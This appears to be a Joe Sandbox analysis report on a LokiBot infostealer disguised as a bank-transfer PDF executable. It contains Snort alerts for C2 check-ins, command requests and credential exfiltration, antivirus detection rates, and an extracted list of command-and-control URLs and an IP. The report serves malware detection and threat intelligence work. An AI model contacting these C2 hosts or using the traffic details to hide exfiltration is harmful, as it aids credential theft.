ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497272025483 11/03/22-12:31:03.547635
SID:	2025483
Source Port:	80
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497362025483 11/03/22-12:31:30.738262
SID:	2025483
Source Port:	80
Destination Port:	49736
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497382025483 11/03/22-12:31:35.287070
SID:	2025483
Source Port:	80
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549717802021641 11/03/22-12:30:35.019960
SID:	2021641
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549736802825766 11/03/22-12:31:29.221112
SID:	2825766
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549743802025381 11/03/22-12:31:43.782645
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852556532014169 11/03/22-12:30:47.939957
SID:	2014169
Source Port:	52556
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549723802024313 11/03/22-12:30:53.367985
SID:	2024313
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549715802025381 11/03/22-12:30:31.132672
SID:	2025381
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549708802825766 11/03/22-12:30:14.035064
SID:	2825766
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549742802024313 11/03/22-12:31:41.893270
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549744802025381 11/03/22-12:31:45.577786
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549729802024318 11/03/22-12:31:05.707382
SID:	2024318
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497302025483 11/03/22-12:31:09.196542
SID:	2025483
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549742802024318 11/03/22-12:31:41.893270
SID:	2024318
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549729802024313 11/03/22-12:31:05.707382
SID:	2024313
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549730802021641 11/03/22-12:31:07.626823
SID:	2021641
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549743802825766 11/03/22-12:31:43.782645
SID:	2825766
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497252025483 11/03/22-12:30:59.345748
SID:	2025483
Source Port:	80
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549707802024312 11/03/22-12:30:11.977904
SID:	2024312
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549732802024318 11/03/22-12:31:20.467945
SID:	2024318
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862520532014169 11/03/22-12:31:07.541345
SID:	2014169
Source Port:	62520
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857322532014169 11/03/22-12:31:39.862228
SID:	2014169
Source Port:	57322
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549707802024317 11/03/22-12:30:11.977904
SID:	2024317
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549732802024313 11/03/22-12:31:20.467945
SID:	2024313
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549713802024313 11/03/22-12:30:25.414440
SID:	2024313
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549726802024318 11/03/22-12:30:59.657451
SID:	2024318
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549724802825766 11/03/22-12:30:54.913991
SID:	2825766
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549727802825766 11/03/22-12:31:01.987085
SID:	2825766
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549720802021641 11/03/22-12:30:45.793165
SID:	2021641
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549718802825766 11/03/22-12:30:37.003049
SID:	2825766
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549723802024318 11/03/22-12:30:53.367985
SID:	2024318
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549711802021641 11/03/22-12:30:20.264286
SID:	2021641
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549730802825766 11/03/22-12:31:07.626823
SID:	2825766
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497442025483 11/03/22-12:31:47.249314
SID:	2025483
Source Port:	80
Destination Port:	49744
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549708802021641 11/03/22-12:30:14.035064
SID:	2021641
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497192025483 11/03/22-12:30:45.376826
SID:	2025483
Source Port:	80
Destination Port:	49719
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497082025483 11/03/22-12:30:15.684954
SID:	2025483
Source Port:	80
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497332025483 11/03/22-12:31:25.021802
SID:	2025483
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549733802825766 11/03/22-12:31:22.614964
SID:	2825766
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549714802021641 11/03/22-12:30:27.432237
SID:	2021641
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549726802024313 11/03/22-12:30:59.657451
SID:	2024313
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497112025483 11/03/22-12:30:21.541561
SID:	2025483
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852079532014169 11/03/22-12:31:11.161882
SID:	2014169
Source Port:	52079
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549710802024313 11/03/22-12:30:18.297577
SID:	2024313
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549712802025381 11/03/22-12:30:22.162497
SID:	2025381
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549710802024318 11/03/22-12:30:18.297577
SID:	2024318
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549745802024318 11/03/22-12:31:50.569101
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861833532014169 11/03/22-12:31:25.278309
SID:	2014169
Source Port:	61833
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549733802021641 11/03/22-12:31:22.614964
SID:	2021641
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549706802025381 11/03/22-12:30:09.785093
SID:	2025381
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549711802825766 11/03/22-12:30:20.264286
SID:	2825766
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497222025483 11/03/22-12:30:53.023996
SID:	2025483
Source Port:	80
Destination Port:	49722
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: transferencia bancaria.pdf.exe	ReversingLabs: Detection: 12%
Source: transferencia bancaria.pdf.exe	Virustotal: Detection: 20%			Perma Link

Multi AV Scanner detection for domain / URL

Source: sempersim.su	Virustotal: Detection: 21%			Perma Link
Source: http://sempersim.su/gl21/fre.php	Virustotal: Detection: 18%			Perma Link

Machine Learning detection for sample

Source: transferencia bancaria.pdf.exe

Joe Sandbox ML: detected

Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gl21/fre.php"]}

Source: transferencia bancaria.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: transferencia bancaria.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49786 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49706 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49706 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49706 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49706 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49706 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:58595 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49707 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49707 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49707 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49707 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49707 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56331 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49708 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49708 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49708 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49708 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49708 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49708
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:50506 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49709 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49709 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49709 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49709 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49709 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49709
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49448 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49710 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49710 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49710 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49710 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49710 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49710
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59082 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49711 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49711 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49711 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49711 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49711 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49711
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59504 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49712 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49712 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49712 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49712 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49712 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49712
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:65198 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49713 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49713 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49713 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49713 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49713 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49713
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62910 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49714 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49714 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49714 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49714 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49714 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49714
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:63863 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49715 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49715 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49715 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49715 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49715 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49715
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:63229 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49716 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49716 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49716 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49716 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49716 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49716
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62538 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49717 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49717 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49717 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49717 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49717 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49717
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:54903 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49718 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49718 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49718 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49718 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49718 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49718
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:51530 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49719 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49719 -> 91.142.77.45:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49719 -> 91.142.77.45:80
